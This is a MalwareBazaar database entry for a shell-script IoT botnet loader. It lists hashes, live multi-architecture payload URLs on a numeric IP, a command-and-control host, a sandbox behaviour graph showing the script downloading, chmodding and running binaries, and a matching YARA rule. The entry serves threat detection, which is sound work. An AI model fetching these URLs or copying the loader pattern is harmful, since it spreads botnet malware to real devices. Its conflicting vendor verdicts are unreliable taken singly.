MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 5


Intelligence 5 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a
SHA3-384 hash: 51b336ff420285e1599e871279993cbf6942d9048509be922164ccc9dbd8f769a2f8e817836e9cdf87114f7e370b7c47
SHA1 hash: c308027a420b1d8c9fb6ab79310e2e74f730e895
MD5 hash: 40e782a24f87367998a855dd090b68a2
humanhash: ohio-utah-carolina-lamp
File name:android.sh
Download: download sample
File size:1'446 bytes
First seen:2026-05-22 00:51:56 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:qmMVTeyv2Uqm75kOvpdHeWkS7tTTNoGz5tNtKAXpYFpdk9Xr0CeUCxucnubpf26o:qHVTz2UbkOX/5TuGz5nwAXph/eUCxucX
TLSH T1E031B1DE08F0B113D998DECCB075C964940095EA36E92629EDEC9C32CDE56B4B0A7F4D
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://176.65.139.188/zzxbzbpq/mzpirni.armn/an/aarm elf ua-wget
http://176.65.139.188/zzxbzbpq/pbjwfob.arm5n/an/aarm elf ua-wget
http://176.65.139.188/zzxbzbpq/rzqgpso.arm6n/an/aarm elf ua-wget
http://176.65.139.188/zzxbzbpq/djvefcm.arm7n/an/aarm elf ua-wget
http://176.65.139.188/zzxbzbpq/xpbtiwv.aarch64n/an/aarm elf ua-wget
http://176.65.139.188/zzxbzbpq/gpzhoxc.mips64n/an/aelf mips ua-wget
http://176.65.139.188/zzxbzbpq/nrfhtqi.mipsn/an/aelf mips ua-wget
http://176.65.139.188/zzxbzbpq/wgstmum.mpsln/an/aelf mips ua-wget
http://176.65.139.188/zzxbzbpq/yxvnqde.ppcn/an/aelf PowerPC ua-wget
http://176.65.139.188/zzxbzbpq/lwsjpul.x86_64n/an/aelf ua-wget x86
http://176.65.139.188/zzxbzbpq/hxwdesw.i686n/an/aelf ua-wget x86
http://176.65.139.188/zzxbzbpq/ijjlglb.i586n/an/aelf ua-wget x86
http://176.65.139.188/zzxbzbpq/cbcicvq.i486n/an/aelf ua-wget x86

Intelligence

File Origin
# of uploads :
1
# of downloads :
58
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive zero-day
Link:
https://www.filescan.io/uploads/6a0fa911efbd399b39c4e088/reports/e011eee4-aab1-43f9-81b8-1e30e475f88a/overview
Verdict:
Clean
File Type:
ps1
Link:
https://opentip.kaspersky.com/cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/d6b6a79d-9abd-48f9-a108-3fa32c7614f7
Behavior Graph:
Download SVG
%3 guuid=c7e8c878-1b00-0000-1986-52e4460b0000 pid=2886 /usr/bin/sudo guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895 /tmp/sample.bin guuid=c7e8c878-1b00-0000-1986-52e4460b0000 pid=2886->guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895 execve guuid=7e63597b-1b00-0000-1986-52e4520b0000 pid=2898 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=7e63597b-1b00-0000-1986-52e4520b0000 pid=2898 execve guuid=0cf49d86-1b00-0000-1986-52e46e0b0000 pid=2926 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=0cf49d86-1b00-0000-1986-52e46e0b0000 pid=2926 execve guuid=a7152d87-1b00-0000-1986-52e46f0b0000 pid=2927 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=a7152d87-1b00-0000-1986-52e46f0b0000 pid=2927 clone guuid=0fb90a88-1b00-0000-1986-52e4720b0000 pid=2930 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=0fb90a88-1b00-0000-1986-52e4720b0000 pid=2930 execve guuid=b32f3190-1b00-0000-1986-52e47d0b0000 pid=2941 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=b32f3190-1b00-0000-1986-52e47d0b0000 pid=2941 execve guuid=458ce790-1b00-0000-1986-52e47e0b0000 pid=2942 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=458ce790-1b00-0000-1986-52e47e0b0000 pid=2942 clone guuid=34ec8291-1b00-0000-1986-52e4810b0000 pid=2945 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=34ec8291-1b00-0000-1986-52e4810b0000 pid=2945 execve guuid=af793d9b-1b00-0000-1986-52e4900b0000 pid=2960 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=af793d9b-1b00-0000-1986-52e4900b0000 pid=2960 execve guuid=d0a17c9b-1b00-0000-1986-52e4910b0000 pid=2961 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=d0a17c9b-1b00-0000-1986-52e4910b0000 pid=2961 clone guuid=1a981c9c-1b00-0000-1986-52e4930b0000 pid=2963 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=1a981c9c-1b00-0000-1986-52e4930b0000 pid=2963 execve guuid=a2ddc6a6-1b00-0000-1986-52e4a30b0000 pid=2979 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=a2ddc6a6-1b00-0000-1986-52e4a30b0000 pid=2979 execve guuid=c77117a7-1b00-0000-1986-52e4a50b0000 pid=2981 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=c77117a7-1b00-0000-1986-52e4a50b0000 pid=2981 clone guuid=473de5a7-1b00-0000-1986-52e4a80b0000 pid=2984 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=473de5a7-1b00-0000-1986-52e4a80b0000 pid=2984 execve guuid=ca100cb2-1b00-0000-1986-52e4b90b0000 pid=3001 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=ca100cb2-1b00-0000-1986-52e4b90b0000 pid=3001 execve guuid=cf59a2b2-1b00-0000-1986-52e4ba0b0000 pid=3002 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=cf59a2b2-1b00-0000-1986-52e4ba0b0000 pid=3002 clone guuid=db35b2b3-1b00-0000-1986-52e4bd0b0000 pid=3005 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=db35b2b3-1b00-0000-1986-52e4bd0b0000 pid=3005 execve guuid=0f0df3bd-1b00-0000-1986-52e4d40b0000 pid=3028 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=0f0df3bd-1b00-0000-1986-52e4d40b0000 pid=3028 execve guuid=f14c36be-1b00-0000-1986-52e4d60b0000 pid=3030 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=f14c36be-1b00-0000-1986-52e4d60b0000 pid=3030 clone guuid=f8fcbfbe-1b00-0000-1986-52e4d90b0000 pid=3033 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=f8fcbfbe-1b00-0000-1986-52e4d90b0000 pid=3033 execve guuid=0a7dabcf-1b00-0000-1986-52e4f90b0000 pid=3065 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=0a7dabcf-1b00-0000-1986-52e4f90b0000 pid=3065 execve guuid=1c1a11d0-1b00-0000-1986-52e4fb0b0000 pid=3067 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=1c1a11d0-1b00-0000-1986-52e4fb0b0000 pid=3067 clone guuid=28e6edd1-1b00-0000-1986-52e4000c0000 pid=3072 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=28e6edd1-1b00-0000-1986-52e4000c0000 pid=3072 execve guuid=7fd714dc-1b00-0000-1986-52e4130c0000 pid=3091 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=7fd714dc-1b00-0000-1986-52e4130c0000 pid=3091 execve guuid=8bb66ddc-1b00-0000-1986-52e4150c0000 pid=3093 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=8bb66ddc-1b00-0000-1986-52e4150c0000 pid=3093 clone guuid=58e346dd-1b00-0000-1986-52e41a0c0000 pid=3098 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=58e346dd-1b00-0000-1986-52e41a0c0000 pid=3098 execve guuid=363ab3e6-1b00-0000-1986-52e4330c0000 pid=3123 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=363ab3e6-1b00-0000-1986-52e4330c0000 pid=3123 execve guuid=6acdf4e6-1b00-0000-1986-52e4340c0000 pid=3124 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=6acdf4e6-1b00-0000-1986-52e4340c0000 pid=3124 clone guuid=296d7ee7-1b00-0000-1986-52e4380c0000 pid=3128 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=296d7ee7-1b00-0000-1986-52e4380c0000 pid=3128 execve guuid=b7ba83ef-1b00-0000-1986-52e44c0c0000 pid=3148 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=b7ba83ef-1b00-0000-1986-52e44c0c0000 pid=3148 execve guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150 memfd: delete-file write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150 execve guuid=7190a6f3-1b00-0000-1986-52e45e0c0000 pid=3166 /usr/bin/wget net send-data write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=7190a6f3-1b00-0000-1986-52e45e0c0000 pid=3166 execve guuid=8a506efc-1b00-0000-1986-52e47a0c0000 pid=3194 /usr/bin/chmod guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=8a506efc-1b00-0000-1986-52e47a0c0000 pid=3194 execve guuid=fb52b5fc-1b00-0000-1986-52e47c0c0000 pid=3196 memfd: write-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=fb52b5fc-1b00-0000-1986-52e47c0c0000 pid=3196 execve guuid=5e81edfe-1b00-0000-1986-52e4820c0000 pid=3202 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=5e81edfe-1b00-0000-1986-52e4820c0000 pid=3202 clone guuid=1206fdfe-1b00-0000-1986-52e4830c0000 pid=3203 /usr/bin/dash guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=1206fdfe-1b00-0000-1986-52e4830c0000 pid=3203 clone guuid=e26f0eff-1b00-0000-1986-52e4840c0000 pid=3204 /usr/bin/rm delete-file guuid=75be017b-1b00-0000-1986-52e44f0b0000 pid=2895->guuid=e26f0eff-1b00-0000-1986-52e4840c0000 pid=3204 execve bbf5bc96-9f47-54ce-aa51-70672524d0f0 176.65.139.188:80 guuid=7e63597b-1b00-0000-1986-52e4520b0000 pid=2898->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 149B guuid=0fb90a88-1b00-0000-1986-52e4720b0000 pid=2930->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=34ec8291-1b00-0000-1986-52e4810b0000 pid=2945->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=1a981c9c-1b00-0000-1986-52e4930b0000 pid=2963->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=473de5a7-1b00-0000-1986-52e4a80b0000 pid=2984->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 153B guuid=db35b2b3-1b00-0000-1986-52e4bd0b0000 pid=3005->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 152B guuid=f8fcbfbe-1b00-0000-1986-52e4d90b0000 pid=3033->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=28e6edd1-1b00-0000-1986-52e4000c0000 pid=3072->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=58e346dd-1b00-0000-1986-52e41a0c0000 pid=3098->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 149B guuid=296d7ee7-1b00-0000-1986-52e4380c0000 pid=3128->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 152B guuid=5205bbf1-1b00-0000-1986-52e4560c0000 pid=3158 memfd: guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150->guuid=5205bbf1-1b00-0000-1986-52e4560c0000 pid=3158 clone guuid=12e95bf3-1b00-0000-1986-52e45b0c0000 pid=3163 memfd: guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150->guuid=12e95bf3-1b00-0000-1986-52e45b0c0000 pid=3163 clone guuid=faf078f3-1b00-0000-1986-52e45c0c0000 pid=3164 memfd: guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150->guuid=faf078f3-1b00-0000-1986-52e45c0c0000 pid=3164 clone guuid=2eae9ef3-1b00-0000-1986-52e45d0c0000 pid=3165 memfd: zombie guuid=1f2dc6ef-1b00-0000-1986-52e44e0c0000 pid=3150->guuid=2eae9ef3-1b00-0000-1986-52e45d0c0000 pid=3165 clone guuid=7a6aa8f3-1b00-0000-1986-52e45f0c0000 pid=3167 memfd: guuid=2eae9ef3-1b00-0000-1986-52e45d0c0000 pid=3165->guuid=7a6aa8f3-1b00-0000-1986-52e45f0c0000 pid=3167 clone guuid=7190a6f3-1b00-0000-1986-52e45e0c0000 pid=3166->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 150B guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168 memfd: dns net send-data write-file guuid=7a6aa8f3-1b00-0000-1986-52e45f0c0000 pid=3167->guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168 clone 80639f7d-8d8e-5d60-8819-65337bb0e774 criminalcloudflare.online:1337 guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->80639f7d-8d8e-5d60-8819-65337bb0e774 send: 256B a0528efd-1018-56b4-b518-221acb0fa7ca 9.9.9.9:53 guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->a0528efd-1018-56b4-b518-221acb0fa7ca send: 43B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 43B guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3170 memfd: guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3170 clone guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3171 memfd: guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3171 clone guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3179 memfd: guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3168->guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3179 clone guuid=691809f0-2200-0000-1986-52e475150000 pid=5493 memfd: guuid=0328b8f3-1b00-0000-1986-52e4600c0000 pid=3170->guuid=691809f0-2200-0000-1986-52e475150000 pid=5493 clone
Score:
99%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a/
Verdict:
Clean
Link:
https://tip.neiki.dev/file/cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a
Threat name:
Script-Shell.Downloader.SAgnt
Create hunting rule
Status:
Malicious
First seen:
2026-05-22 00:54:33 UTC
File Type:
Text (Shell)
AV detection:
10 of 24 (41.67%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=zwxyjbnpd2642rrguop7gi67xjoe7hgegs3ic2prsszsag6tcjna._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/260522-a8mm9sbt8r/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a

(this sample)

elf 9feea8bd5371b02866687ac52c56fadcf77f2d00be52b94cc9087d77d37daa08

  
URLhaus
https://urlhaus.abuse.ch/url/3851503/
  
Delivery method
Distributed via web download
  
Dropping
MD5 820ec43b3fde6ee8c3ce0191b88ab482
  
Dropping
SHA256 9feea8bd5371b02866687ac52c56fadcf77f2d00be52b94cc9087d77d37daa08

Comments